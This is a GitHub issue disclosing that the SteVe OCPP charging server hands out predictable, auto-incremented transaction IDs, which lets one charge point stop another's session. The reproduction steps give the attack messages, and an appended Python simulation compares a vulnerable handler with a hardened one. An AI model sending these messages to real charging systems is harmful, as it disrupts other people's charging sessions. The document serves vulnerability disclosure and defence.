
Predictable Transaction ID Possible Vulnerability Allows Unauthorized Termination of OCPP Sessions

Open Tano-Coppoletta opened this issue 9 months ago • 4 comments

Checklist

  • [x] I checked other issues already, but found no answer/solution
  • [ ] I checked the documentation and wiki, but found no answer/solution
  • [ ] I am running the latest version and the issue still occurs
  • [x] I am sure that this issue is about SteVe (and not about the charging station software or something unrelated to SteVe)

Specifications

SteVe Version     : 3.6.0
Operating system  : Ubuntu 22.04.1
JDK               : openjdk version "11.0.20.1"
Database          : version 1.0.3

Docker Container Setup

Two Docker containers are set up to simulate two OCPP clients for testing purposes.

Issue Description

A possible security vulnerability was identified where unauthorized termination of transactions is possible due to predictable transaction IDs. The server issues a new transaction ID upon receiving an incomplete StartTransaction request and, because the IDs are auto-incremented, an attacker can predict and use them to terminate other transactions.

Steps to Reproduce

  1. From the first Docker container (Client 1), a transaction is started:
    [2,"1","StartTransaction", {
        "connectorId": 1,
        "idTag": "test",
        "meterStart": 20,
        "timestamp": "2023-09-03T12:34:56Z"
    }]
    
  2. From the second Docker container (Client 2), a StartTransaction request with an empty idTag is sent to obtain a new transaction ID:
    [2, "1", "StartTransaction", {"idTag": ""}]

  3. Client 2 then sends a StopTransaction request using the new transaction ID minus 1:
    [2, "1", "StopTransaction", {
        "meterStop": 1,
        "timestamp": "2023-11-06T15:54:23Z",
        "transactionId": [Retrieved Transaction ID - 1],
        "reason": "EVDisconnected",
        "transactionData": [...]
    }]

  4. The unauthorized termination of Client 1's transaction is confirmed via the web interface.

Expected behavior

The server should not issue a transaction ID for incomplete StartTransaction requests and should authenticate StopTransaction requests before processing.

Actual behavior

The server processes unauthorized StopTransaction requests using predicted transaction IDs.

Tano-Coppoletta avatar Nov 09 '23 18:11 Tano-Coppoletta
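As an added illustration (this is not SteVe's code and not part of the reporter's issue), the following Python simulation replays the three messages from the steps above against a toy OCPP 1.6-J central system. The same handler runs in two modes: `hardened=False` models the behaviour described in the issue (auto-incremented transaction IDs, an incomplete StartTransaction still allocates an ID, StopTransaction is not tied to the station that started the transaction); `hardened=True` rejects incomplete StartTransaction requests, draws unpredictable IDs, and refuses a StopTransaction from a different charge point. The in-memory transaction table, the `chargeBoxId` argument (assumed to come from the authenticated WebSocket path, as in OCPP-J) and the error-code choices are assumptions for the example:

```python
"""Toy OCPP 1.6-J central system: replays the predictable-transaction-ID attack
described in the issue against a vulnerable and a hardened handler."""
import json
import secrets

CALL, CALLRESULT, CALLERROR = 2, 3, 4   # OCPP-J message type IDs


class CentralSystem:
    """Minimal handler for StartTransaction/StopTransaction only (example code)."""

    def __init__(self, hardened):
        self.hardened = hardened
        self.next_id = 1          # auto-increment counter, used in vulnerable mode
        self.transactions = {}    # transactionId -> {"chargeBoxId": ..., "active": ...}

    def _new_transaction_id(self):
        if self.hardened:
            # Unpredictable ID: knowing your own ID tells you nothing about others.
            while True:
                tid = secrets.randbelow(2**31 - 1) + 1
                if tid not in self.transactions:
                    return tid
        tid = self.next_id        # vulnerable: sequential, hence guessable
        self.next_id += 1
        return tid

    def handle(self, charge_box_id, raw):
        """Process one OCPP-J frame from station `charge_box_id`; returns the reply frame."""
        msg = json.loads(raw)
        if not isinstance(msg, list) or len(msg) != 4 or msg[0] != CALL:
            return json.dumps([CALLERROR, "", "ProtocolError", "malformed CALL", {}])
        _, uid, action, payload = msg
        if action == "StartTransaction":
            return self._start(charge_box_id, uid, payload)
        if action == "StopTransaction":
            return self._stop(charge_box_id, uid, payload)
        return json.dumps([CALLERROR, uid, "NotImplemented", action, {}])

    def _start(self, cb, uid, p):
        required = ("connectorId", "idTag", "meterStart", "timestamp")
        if self.hardened and (any(k not in p for k in required) or not p["idTag"]):
            # Hardened: an incomplete request must not allocate a transaction ID.
            return json.dumps([CALLERROR, uid, "FormationViolation",
                               "missing StartTransaction fields", {}])
        tid = self._new_transaction_id()
        self.transactions[tid] = {"chargeBoxId": cb, "active": True}
        return json.dumps([CALLRESULT, uid,
                           {"transactionId": tid, "idTagInfo": {"status": "Accepted"}}])

    def _stop(self, cb, uid, p):
        tx = self.transactions.get(p.get("transactionId"))
        if tx is None:
            return json.dumps([CALLERROR, uid, "PropertyConstraintViolation",
                               "unknown transactionId", {}])
        if self.hardened and tx["chargeBoxId"] != cb:
            # Hardened: only the station that started the transaction may stop it.
            return json.dumps([CALLERROR, uid, "SecurityError",
                               "transaction belongs to another charge point", {}])
        tx["active"] = False
        return json.dumps([CALLRESULT, uid, {"idTagInfo": {"status": "Accepted"}}])


def reproduce(hardened):
    """Replay the issue's three messages (constructed inputs, taken from the report).
    Returns the reply types the attacker sees and whether the victim's transaction survived."""
    cs = CentralSystem(hardened)
    # Step 1: Client 1 (victim, chargeBoxId "CP1") starts a legitimate transaction.
    r1 = json.loads(cs.handle("CP1", json.dumps([2, "1", "StartTransaction", {
        "connectorId": 1, "idTag": "test", "meterStart": 20,
        "timestamp": "2023-09-03T12:34:56Z"}])))
    # Step 2: Client 2 (attacker, "CP2") probes for a fresh ID with an incomplete request.
    r2 = json.loads(cs.handle("CP2", json.dumps([2, "1", "StartTransaction", {"idTag": ""}])))
    if r2[0] == CALLRESULT:
        guess = r2[2]["transactionId"] - 1   # predict the victim's ID from the leaked one
    else:
        guess = 1                            # nothing leaked; attacker guesses blindly
    # Step 3: attacker sends StopTransaction for the predicted ID.
    r3 = json.loads(cs.handle("CP2", json.dumps([2, "1", "StopTransaction", {
        "meterStop": 1, "timestamp": "2023-11-06T15:54:23Z",
        "transactionId": guess, "reason": "EVDisconnected", "transactionData": []}])))
    victim_tid = r1[2]["transactionId"]
    return {"probe_reply": r2[0], "stop_reply": r3[0],
            "victim_active": cs.transactions[victim_tid]["active"]}


if __name__ == "__main__":
    print("vulnerable:", reproduce(hardened=False))   # victim_active False: attack works
    print("hardened:  ", reproduce(hardened=True))    # victim_active True: attack fails
```

The two controls are independent: random IDs stop the prediction, and binding each transaction to the `chargeBoxId` of the connection that started it stops the termination even if an attacker learns an ID some other way. Rejecting incomplete StartTransaction requests closes the cheap ID oracle described in the report but is not a sufficient fix on its own.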